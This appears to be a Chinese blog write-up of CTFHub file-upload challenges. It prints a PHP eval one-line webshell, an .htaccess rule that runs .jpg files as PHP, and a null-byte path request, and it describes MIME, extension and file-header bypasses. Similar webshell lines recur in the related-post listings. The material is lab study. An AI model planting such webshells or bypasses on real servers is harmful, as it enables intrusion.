CTFHub-文件上传

已于 2022-04-15 15:39:22 修改
阅读量822 收藏 3
点赞数
分类专栏: CTFHub 文章标签: 安全
于 2022-04-08 15:57:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45751902/article/details/124039951
版权

无验证

上传一个一句话木马

<?php @eval($_POST['upload']);?>

在这里插入图片描述
然后用蚁剑连接
在上级目录就可以看到flag的php文件

在这里插入图片描述

前端验证

这个可以用burp suit抓包,分析一下,发现只允许jpg,png,gif格式上传,
在这里插入图片描述
我们将php文件后缀改成jpg提交,然后抓包再改回来,用蚁剑连接成功
在这里插入图片描述

.htaccess验证

htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能

先上传htaccess,然后上传jgp文件

将后缀为jpg的文件解析成php
<FilesMatch "jpg">
	SetHandler application/x-httpd-php
</FilesMatch>

在这里插入图片描述
在这里插入图片描述

MIME绕过

MIME类型校验就是我们在上传文件到服务端的时候,服务端会对客户端也就是我们上传的文件的Content-Type类型进行检测,如果是白名单所允许的,则可以正常上传,否则上传失败。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

00截断

0x00是字符串的结束标识符,攻击者可以利用手动添加字符串标识符的方式来将后面的内容进行截断,而后面的内容又可以帮助我们绕过检测。

php版本小于5.3.4
php的magic_quotes_gpc为OFF状态

这道题我浪费了很长时间,路径错了
修改的路径

POST /?road=/var/www/html/upload/1.php%00 HTTP/1.1

但是连接蚁剑的路径确是这样

http://challenge-e7ee2db32956d663.sandbox.ctfhub.com:10800/upload/1.php

我理解的应该是这样

http://challenge-e7ee2db32956d663.sandbox.ctfhub.com:10800/?road=/var/www/html/upload/1.php

我理解的路径是错的,我是看前面的路径修改的,竟然连上蚁剑了
在这里插入图片描述
在这里插入图片描述

双写后缀

在这里插入图片描述
在这里插入图片描述

文件头检测

随便提交一个文件
在这里插入图片描述
然后上传一个jpg文件,发现报错,考虑图片马
在这里插入图片描述
制作图片马(图片大小最好不要超过20kb,否则上传失败)
在这里插入图片描述
上传文件,用burp抓包,并修改文件后缀
在这里插入图片描述

在这里插入图片描述

空白行
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CtfHub-wp(web)
01-23
ctfhub平台web篇wp
ctfshow web165 JPG二次渲染脚本(生成图片马)脚本
10-21
ctfshow web165 JPG二次渲染脚本(生成图片马)脚本
CTFHub-Web-文件
最新发布
IceCream的博客
05-01 1063
1.编写一段PHP木马脚本2.将编写好的木马进行上3.显示上成功了4.使用文件工具进行尝试5.连接成功进入文件管理6.上翻目录找到flag文件7.打开文件查看flag。
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
内容概要: CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛中,可利用该工具自动识别编码类型并解码,快速解决misc类别的密码题目。 其他说明: 该工具具备智能判断密码编码类型的功能,大大减少手工判断和重复尝试的时间,使密码解码更为便捷高效。
[极客大挑战 2019]Upload、[ACTF2020 新生赛]Upload、[MRCTF2020]你你呢
2401_82985722的博客
04-26 415
文件内容的起始位置加上一个GIF89a,文件就会被认为是一个图片。试试改后缀为phtml,提示语句中不能包含<?想到用文件头GIF89a绕过,bp抓包修改,终于上成功。连接蚁剑,注意修改路径(一般为upload/文件名)(2)偶然上了代码如下的png文件,发现也能上成功。抓包修改Type为jpg图片,文件后缀名可用.pht。的图片马(还是报错)先上1.php试试,发现不可以。连接蚁剑,在根目录下得到flag。打开环境,是上一句话木马的题。试试1.php,弹窗提示。连接蚁剑,得到flag。
CTFHub 技能树-web文件
akxnxbshai的博客
03-09 4525
目录 无过滤: 前端过滤: .htaccess: MIME绕过: 双写后缀: 文件头检查: 无过滤: 直接入一句话木马: <?php @eval($_POST['1']);?> 然后用蚁剑连一下: 得到flag: 前端过滤: function checkfilesuffix() { var file=document.getElementsByName('file')[0]['value']; if(file==""||file==n
CTFHub技能树 Web-文件 详解
weixin_45808483的博客
11-15 2609
无验证 启动环境 我们上一句话木马 <?php @eval($_POST['shell']);?> 提示了相对路径, 我们直接使用蚁剑连接。 找到flag。 前端验证 上php文件,前端校验不允许上php文件 审计代码,只允许上图片类型 我们先将后缀改为 .jpg 上成功 再通过burp抓包,修改filename="1.php"和Content-Type: php 发送数据包,页面显示上成功 使用蚁剑连接 成...
CTFHub技能树 Web-文件详解
千寻的博客
11-21 2924
文件漏洞是指由于程序员在对用户文件部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上可执行的动态脚本文件。这里上文件可以是木马,病毒,恶意脚本或者WebShell等。“文件”本身没有问题,有问题的是文件后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 ———————————————— 版权声明:本文为CSDN博主「Fasthand_」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。 原文链接:ht
ctfhub——技能树--文件
lulu001128的博客
02-28 634
文件解题过程
CTFhub技能树之文件
yzl_007的博客
08-10 353
CTFhub技能书文件 无验证 没什么好说的,直接 前端验证 很明显是前端js阻止了php文件 F12找到验证,删除成功上 返回了路径 蚁剑连接拿到flag .htaccess F12可以看到基本上对php\php5之类的一系列后缀都做了禁用 标题也告诉了我们,改变.htaccess规则,即上对应的图片马,解析成php文件执行一句话木马进行连接。 将.htaccess文件编辑如下,将任何文件解析成php SetHandler application/x-httpd-php 抓包,修改
ctfhub技能树—文件(全)
Naptmn的博客
02-10 1600
无验证 直接上一句话木马,之后蚁剑连接即可。记得要加相对地址去连接。在www文件夹下可以找到flag
CTFtools-SNOW.zip
11-03
Windows下SNOW隐写工具 snow.exe -C -m "被隐藏的信息“ -p "文件
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
3.18号日报,ctfhub中web,文件漏洞题目解法
03-18
文件漏洞
CTF 总结01:文件绕过
weixin_42789937的博客
12-11 5490
文件的番外,一句话木马绕过思路,第二版整理,还是会根据做题经验增补的~
蚁剑--编码器的利用
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-22 428
先说下蚁剑编码器的作用,当使用蚁剑控制webshell向服务器发送数据包时,数据包中的body部分会按照编码器中定义的规则进行编码或者加密后在发送,这样就可以避免有比较明显的命令执行特征从而被WAF拦截。
Burpsuite配合蚁剑制作并连接图片马
多喝i热水的博客
01-28 8802
目录 制作图片马 利用文件包含漏洞 使用蚁剑连接 制作图片马 利用文件包含漏洞 创建PHP文件包含解析图片马里的php脚本。upload-labs本身应该会包含一个include.php,模拟页面存在文件包含漏洞 使用蚁剑连接 ...
文件漏洞 (upload部分通关教程)
m0_70349048的博客
02-21 1195
复现多种文件漏洞
CTFHUB WEB 文件(上)
wwwwyyyrre的博客
04-26 748
在浏览器中显示的内容有 HTML、有 XML、有 GIF、还有 Flash ……抓一下包试试 正常情况都是可以抓到包的 如果在你的bp以及代理都没问题的情况下抓不到包并且还有提示该文件不允许上 那么可能就是使用了js前端验证。因为这道题无验证 说明只要是文件就可以上 因此上一个一句话木马 php文件 再用蚁剑连接就能拿到其flag。在文件漏洞中 js函数的主要作用就是验证你上文件类型是不是它允许的文件类型。了解了这些 我们正式进入实战 这里用的是ctfhub技能树的文件题目。
ctfhub-git泄露stash
09-13
根据引用和引用提供的信息,你可以尝试使用GitHack和dirsearch工具来扫描和利用ctfhub-git的泄露。首先,进入GitHack文件夹,执行命令"python GitHack.py http://challenge-e87e0210287ba7b3.sandbox.ctfhub.com:10800/.git/"来使用GitHack工具进行扫描和利用。同时,你也可以使用dirsearch工具来扫描目录,执行命令"python dirsearch.py -u http://challenge-5a5d24023f7ea71c.sandbox.ctfhub.com:10800 -e git -t 5"来查找ctfhub-git泄露的stash。 然而,需要注意的是,这些工具只是为了帮助你快速发现ctfhub-git的泄露,真正的挖掘过程并不会像这样直接告诉你哪里有泄露,需要自己去尝试和探索。此外,Git这一工具的使用也相当复杂,需要深入学习和实践才能熟练掌握。所以,在学习的道路上还有很长的路要走,希望你能坚持学习,共同进步!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值